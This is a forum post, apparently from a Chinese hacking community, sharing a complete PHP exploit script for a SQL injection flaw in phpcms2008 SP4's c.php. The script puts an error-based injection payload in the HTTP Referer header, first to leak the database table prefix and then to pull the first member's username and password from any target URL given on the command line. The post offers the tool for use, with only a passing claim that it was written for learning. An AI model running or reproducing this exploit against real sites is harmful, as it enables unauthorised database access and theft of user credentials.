phpcms2008 sp4 注入Exp (保号 我也发个exp)

2013-05-01 22:51:59 58 4985
保号 我也发个exp
前段时间 情深哥哥 和西毒二货 都发过了
抱着学习的太多 自已也写了一个。。。
<?php

print_r ( "
+---------------------------------------+
title:phpcms2008 sp4 c.php exploit
mail:[email protected]
blog:[url]www.moonhack.org[/url]
bbs:[url]www.xinyues.org[/url]
data:2013.3.28       
+---------------------------------------+\n
" );
if ($argc < 2) {
print_r ( "
+---------------------------------------+
target:
php $argv[0] [url]www.target.com[/url]
php $argv[0] [url]www.target.com[/url] /phpcms2008/
+---------------------------------------+\n
" );
exit ();
}
error_reporting ( E_ALL );
ini_set ( 'max_execution_time', '0' );
function send_http($host, $prot, $referer) {
        $data = "";
        $fp = @fsockopen ( $host, $prot, $errno, $errstr, 30 );
        if (! $fp) {
                exit ( "$host Connection failed" );
        } else {
               
                fwrite ( $fp, $referer );
                while ( ! feof ( $fp ) ) {
                        $data .= fgets ( $fp, 128 );
                }
                fclose ( $fp );
                return $data;
        }

}
$host = $argv [1];
$prot = "80";
$patch = isset ( $argv [2] ) ? $argv [2] : "";
$sql = "fuck'";

$prefix = http ( $host, $prot, $sql, $patch );
function http($host, $prot, $sql, $patch) {
        $preg = '/INSERT INTO `(.*)ads_/';
        $prefix = '';
        $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
        $referer .= "Host: $host\r\n";
        $referer .= "REFERER: $sql\r\n";
        $referer .= "Connection: Close\r\n\r\n";
        $data = send_http ( $host, $prot, $referer );
        $data ;
        preg_match ( $preg, $data, $prefix );
        if (! $prefix) {
        exit ( "fail\r\n" );
        }
        print ("prefix:$prefix[1]") ;
        return $prefix [1];
}

$exp = http2 ( $host, $prot, $patch, $prefix );
function http2($host, $prot, $patch, $prefix) {
        $preg = '/\'~\'(.*):(.*)\'~1\'/';
        $sql2 = $sqlstring = "fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from " . $prefix . "member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#";
        $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1\r\n";
        $referer .= "Host: $host\r\n";
        $referer .= "REFERER: $sql2\r\n";
        $referer .= "Connection: Close\r\n\r\n";
        $data = send_http ( $host, $prot, $referer );
        preg_match ( $preg, $data, $exp );
        if (! $exp) {
                exit ( "fail\r\n" );
        }
        return $exp;
}
print_r ( "
success:$host
username:$exp[1]
password:$exp[2]
" );
?>

关于作者

darkmoon23篇文章760篇回复

评论58次

要评论?请先  登录  或  注册